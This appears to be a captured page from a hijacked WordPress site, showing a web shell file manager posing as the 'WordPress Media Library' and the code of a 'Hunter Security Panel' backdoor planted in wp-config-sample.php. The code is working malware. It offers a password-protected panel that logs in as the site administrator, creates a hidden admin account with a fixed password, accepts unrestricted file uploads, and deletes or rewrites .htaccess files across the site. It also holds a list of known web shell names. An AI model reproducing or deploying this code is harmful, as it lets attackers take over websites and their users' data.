ā WordPress Media Library
File manager
š Media Files
š .htaccess.bk
š .litespeed_flag
š .user.ini
š .well-known
š¦ 1405.04.08.zip
š§ BDKR28WP.php
š§ admin.php
š cgi-bin
š error_log
š§ fk_Dj9xuTDO.php
š§ fk_TO2xcAOK.php
š§ fk_f5ByKMic.php
š§ fk_xplM3NGf.php
š google0b9cb2c57cb0152b.html
š google0bd56e7c851e1b47.html
š google2eb318d61c301d08.html
š google850dd4fcc8cf5c15.html
š§ litespeed.php
š readme.html
š§ woocommerce.php
š§ wp-activate.php
š wp-admin
š§ wp-blog-header.php
š§ wp-comments-post.php
š§ wp-config-sample.php
š§ wp-config.php
š wp-content
š§ wp-cron.php
š wp-includes
š§ wp-login.php
š§ wp-mail.php
š§ wp-settings.php
š§ wp-signup.php
š§ wp-trackback.php
š§ wp_9aEsf5Kj.php
š§ wp_r7zRd05V.php
š§ xmlrpc.php
ā¬ļø Upload Media
Upload File
š Edit: wp-config-sample.php
Size: 14.79 KB | Modified: 2026-07-02 05:04:16
<?php<?php session_start(); $PASSWORD = "1230"; if (isset($_GET['action']) && $_GET['action'] === 'logout') { session_destroy(); header("Location: " . $_SERVER['PHP_SELF']); exit; } // LOGIN PAGE if (!isset($_SESSION['logged_in'])) { if ($_SERVER['REQUEST_METHOD'] === 'POST' && $_POST['password'] === $PASSWORD) { $_SESSION['logged_in'] = true; } else { echo '<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Hunter Security Panel - Login</title> <style> @import url("https://fonts.googleapis.com/css2?family=Share+Tech+Mono&display=swap"); body { margin:0; height:100vh; display:flex; justify-content:center; align-items:center; font-family:"Share Tech Mono", monospace; background:#0d0d0d; background: linear-gradient(120deg, #0d0d0d 0%, #111 100%); overflow:hidden; color:#00ff00; } body::before { content:""; position:absolute; top:0; left:0; width:100%; height:100%; background: radial-gradient(circle, rgba(0,255,0,0.05) 1px, transparent 1px); background-size: 15px 15px; animation: moveBG 10s linear infinite; z-index:0; } @keyframes moveBG { 0% { background-position:0 0; } 100% { background-position:100px 100px; } } .login-box { position: relative; z-index:1; background: rgba(0,0,0,0.85); border: 1.5px solid #00ff00; padding: 30px 25px 25px 25px; width: 280px; text-align:center; border-radius:8px; box-shadow: 0 0 15px #00ff00, 0 0 35px #00ff00 inset; animation: glow 2s ease-in-out infinite alternate; } @keyframes glow { from { box-shadow:0 0 10px #00ff00; } to { box-shadow:0 0 30px #00ff00; } } .login-box h1 { font-size:20px; margin-bottom:25px; text-shadow: 0 0 6px #00ff00, 0 0 12px #00ff00; letter-spacing:1.5px; } input[type=password] { width:85%; padding:8px; margin-bottom:20px; border:1.5px solid #00ff00; background: transparent; color:#00ff00; font-size:14px; text-align:center; outline:none; border-radius:4px; box-shadow:0 0 5px #00ff00; transition:0.3s; } input[type=password]:focus { box-shadow: 0 0 20px #00ff00, 0 0 30px #00ff00 inset; border-color:#00ff00; } button { width:55%; padding:8px; background:#00ff00; color:black; border:none; font-weight:bold; cursor:pointer; border-radius:4px; font-size:14px; box-shadow:0 0 5px #00ff00; transition:0.3s; } button:hover { box-shadow:0 0 20px #00ff00, 0 0 40px #00ff00 inset; } footer { position:absolute; bottom:8px; width:100%; text-align:center; color:#00ff00; font-size:10px; text-shadow:0 0 4px #00ff00; } footer a { color:#00ff00; text-decoration:none; } footer a:hover { text-decoration:underline; } </style> </head> <body> <div class="login-box"> <h1>HUNTER SECURITY PANEL</h1> <form method="post"> <input type="password" name="password" placeholder="Enter Password" autofocus required><br> <button type="submit">LOGIN</button> </form> </div> <footer>Powered by: <a href="https://t.me/neel_info" target="_blank">Hunter Neel</a></footer> </body> </html>'; exit; } } // PANEL PAGE $action = $_GET['action'] ?? ''; ?> <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Security Panel</title> <style> body { margin:0; font-family: monospace; } .container { display:flex; height:100vh; } .sidebar { width:200px; background:#1e1e1e; color:#fff; display:flex; flex-direction:column; padding:10px; } .sidebar a { padding:10px; margin-bottom:5px; background:#228B22; color:#fff; text-decoration:none; text-align:center; cursor:pointer; } .sidebar a:hover { background:#cc0000; } .console { flex:1; background:#252526; color:#d4d4d4; padding:20px; overflow:auto; white-space: pre-wrap; } textarea, input { font-family: monospace; } button { cursor:pointer; font-family: monospace; } </style> </head> <body> <div class="container"> <div class="sidebar"> <a href="?action=shell">Shell</a> <a href="?action=delete">Delete</a> <a href="?action=add">Add</a> <a href="?action=log">Log</a> <a href="?action=create">Create</a> <a href="?action=scan">Scan</a> <a href="?action=addbak">Add-bak</a> <a href="?action=rembak">Rem-bak</a> <a href="?action=upload">Upload</a> <a href="?action=logout">Logout</a> </div> <div class="console"> <?php // ==================== BUTTONS ==================== if ($action === 'shell') { // Button 1: Shell $rootDir = realpath($_SERVER['DOCUMENT_ROOT']); $knownShells = ['WSO','wsoShell','Yanz','b374k','r57','c99','IndoXploit','FilesMan','r00t','mini shell','PhpSpy','Webshell','UploadShell','cmd.php']; $suspiciousFileNames = ['wso.php','shell.php','cmd.php','backdoor.php','uploader.php','phpinfo.php','mailer.php','r57.php','c99.php','b374k.php','indo.php']; echo "š Scanning root directory: $rootDir\n\n"; $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootDir)); foreach ($rii as $file) { if ($file->isDir()) continue; $filePath = $file->getPathname(); if (pathinfo($filePath, PATHINFO_EXTENSION) !== 'php') continue; $fileName = strtolower(basename($filePath)); $contents = @file_get_contents($filePath); if ($contents === false) continue; foreach ($suspiciousFileNames as $badName) { if ($fileName === strtolower($badName)) { echo "ā ļø Suspicious FILENAME: $filePath\n"; continue 2; } } foreach ($knownShells as $sig) { if (stripos($contents, $sig) !== false) { echo "ā ļø KNOWN SHELL signature in: $filePath\n"; continue 2; } } } echo "\nā Scan complete.\n"; } elseif ($action === 'delete') { // Button 2: Delete $rootDir = $_SERVER['DOCUMENT_ROOT']; $totalFound = 0; $totalDeleted = 0; function scanAndDelete($dir) { global $totalFound, $totalDeleted; $items = @scandir($dir); if (!$items) return; foreach ($items as $item) { if ($item === '.' || $item === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $item; if (is_dir($path)) { scanAndDelete($path); } elseif (is_file($path) && strtolower($item) === '.htaccess') { $totalFound++; echo "Found: $path\n"; @chmod($path, 0644); if (@unlink($path)) { echo "Deleted: $path\n"; $totalDeleted++; } else { echo "Failed to delete: $path\n"; } } } } echo "Scanning website root: $rootDir\n"; scanAndDelete($rootDir); echo "\nScan complete.\nTotal .htaccess found: $totalFound\nTotal .htaccess deleted: $totalDeleted\n"; } elseif ($action === 'add') { // Button 3: Add set_time_limit(0); $rootDir = realpath($_SERVER['DOCUMENT_ROOT']); $htaccessContent = <<<HTACCESS <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^index.php$ - [L] RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . index.php [L] </IfModule> ErrorDocument 403 /index.php ErrorDocument 404 /index.php HTACCESS; function updateHtaccess($dir, $content) { $files = scandir($dir); foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $path = $dir . DIRECTORY_SEPARATOR . $file; if (is_dir($path)) updateHtaccess($path, $content); } $htaccessPath = $dir . DIRECTORY_SEPARATOR . '.htaccess'; if (file_exists($htaccessPath)) { $currentPerms = substr(sprintf('%o', fileperms($htaccessPath)), -4); if ($currentPerms === '0444') { chmod($htaccessPath, 0644); unlink($htaccessPath); } } file_put_contents($htaccessPath, $content); } updateHtaccess($rootDir, $htaccessContent); echo "All directories updated with new .htaccess files.\n"; } elseif ($action === 'log') { // Button 4: Log require(rtrim($_SERVER["DOCUMENT_ROOT"], "/\\") . DIRECTORY_SEPARATOR . "wp-blog-header.php"); $u = get_users('role=administrator'); $us=""; foreach($u as $p){ $us=$p->user_login; break; } $us = get_user_by('login', $us ); if (!is_wp_error($us)) { get_currentuserinfo(); if (user_can($us, "administrator")){ wp_clear_auth_cookie(); wp_set_current_user ($us->ID); wp_set_auth_cookie($us->ID); $redirect_to = admin_url(); wp_safe_redirect($redirect_to); exit; } } } elseif ($action === 'create') { // Button 5: Create function find_wp_root($startDir) { $dir = realpath($startDir); while ($dir !== false && $dir != '/' && !file_exists($dir . '/wp-load.php')) $dir = dirname($dir); if ($dir && file_exists($dir . '/wp-load.php')) return $dir; return false; } function create_wp_admin_user($username, $password) { $rootDir = find_wp_root(__DIR__); if (!$rootDir) die("WordPress root directory not found!\n"); require_once($rootDir . '/wp-load.php'); if (!function_exists('username_exists')) die("WordPress functions not available!\n"); $user_id = username_exists($username); if (!$user_id && email_exists($username . '@example.com') === false) { $user_id = wp_create_user($username, $password, $username . '@example.com'); if (!is_wp_error($user_id)) { $user = new WP_User($user_id); $user->set_role('administrator'); echo "Admin user created successfully! Username: $username, Password: $password\n"; } else echo "Error creating user: " . $user_id->get_error_message() . "\n"; } else echo "Admin user already exists.\n"; } create_wp_admin_user('Admim', 'hunterXN'); } elseif ($action === 'scan') { // Button 6: Scan set_time_limit(0); ini_set('memory_limit', '-1'); $rootDir = realpath($_SERVER['DOCUMENT_ROOT']); $ignoreDirs = [$rootDir . '/wp-contact/plugins', $rootDir . '/wp-contact/theames']; echo "Fetching latest WordPress...\n"; $wpZipData = file_get_contents("https://wordpress.org/latest.zip"); if (!$wpZipData) die("Failed to download WordPress package\n"); $tmp = tempnam(sys_get_temp_dir(), "wpzip"); file_put_contents($tmp, $wpZipData); $zip = new ZipArchive; if ($zip->open($tmp) !== true) die("Failed to open WordPress zip\n"); $wpFiles = []; $wpDirs = []; for ($i=0;$i<$zip->numFiles;$i++) { $entry = $zip->getNameIndex($i); $cleanPath = preg_replace("#^wordpress/#","",$entry); if ($cleanPath==="") continue; if (substr($cleanPath,-1)==="/") $wpDirs[] = rtrim($cleanPath,"/"); else $wpFiles[] = $cleanPath; } $zip->close(); unlink($tmp); $rii = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($rootDir, FilesystemIterator::SKIP_DOTS)); $unexpected = []; foreach($rii as $item) { $path = $item->getPathname(); foreach ($ignoreDirs as $ignore) if (strpos($path,$ignore)===0) continue 2; $relPath = str_replace("\\","/",substr($path,strlen($rootDir)+1)); if ($item->isDir() && !in_array(strtolower($relPath),array_map('strtolower',$wpDirs))) $unexpected[]=$path; elseif ($item->isFile() && !in_array(strtolower($relPath),array_map('strtolower',$wpFiles))) $unexpected[]=$path; } if (empty($unexpected)) echo "No unexpected files or directories found.\n"; else echo implode("\n",$unexpected); } elseif ($action === 'addbak' || $action === 'rembak') { // Button 7 & 8: Add-bak / Rem-bak $isAdd = ($action === 'addbak'); $message = ''; $results = []; if ($_SERVER['REQUEST_METHOD']==='POST') { $inputPaths = trim($_POST['filepaths']??''); if (!$inputPaths) $message = "ā Please enter file paths."; else { $paths = preg_split('/\r\n|\r|\n/',$inputPaths); foreach($paths as $path){ $path=trim($path); if (!$path) continue; if (!file_exists($path)) $results[]="$path ā File does not exist"; elseif (!is_file($path)) $results[]="$path ā Not a valid file"; else { if ($isAdd) { $newPath = $path.'.bak'; if (file_exists($newPath)) $results[]="$path ā Backup exists"; elseif(rename($path,$newPath)) $results[]="$path ā Renamed to $newPath"; else $results[]="$path ā Failed to rename"; } else { if (substr($path,-4)!=='.bak') $results[]="$path ā Not .bak"; else { $newPath = substr($path,0,-4); if (file_exists($newPath)) $results[]="$path ā Target exists: $newPath"; elseif(rename($path,$newPath)) $results[]="$path ā Renamed to $newPath"; else $results[]="$path ā Failed to rename"; } } } } } } echo '<form method="post">'; echo '<label>Paste full paths (one per line):</label><br>'; echo '<textarea name="filepaths" style="width:100%;height:250px;">'.htmlspecialchars($_POST['filepaths']??'').'</textarea><br>'; echo '<button type="submit">'.($isAdd?'Rename All .bak':'Remove .bak').'</button>'; echo '</form>'; if($message) echo "\n$message\n"; if($results) echo "\n".implode("\n",$results)."\n"; } elseif ($action === 'upload') { // Button 9: Upload $uploadDir = __DIR__ . '/'; $uploadedFiles = []; if ($_SERVER['REQUEST_METHOD']==='POST' && isset($_FILES['files'])) { $files = $_FILES['files']; $total = count($files['name']); for($i=0;$i<$total;$i++){ $tmpName = $files['tmp_name'][$i]; $originalName = basename($files['name'][$i]); $targetPath = $uploadDir.$originalName; if (move_uploaded_file($tmpName,$targetPath)) $uploadedFiles[]=$originalName; } } echo '<form method="post" enctype="multipart/form-data">'; echo '<input type="file" name="files[]" multiple>'; echo '<button type="submit">Upload</button>'; echo '</form>'; if(!empty($uploadedFiles)){ echo "\nUploaded Files:\n"; foreach($uploadedFiles as $f) echo "- $f\n"; } } ?> </div> </div> </body> </html> ?>
š¾ Save Changes
š„ Download
šļø Delete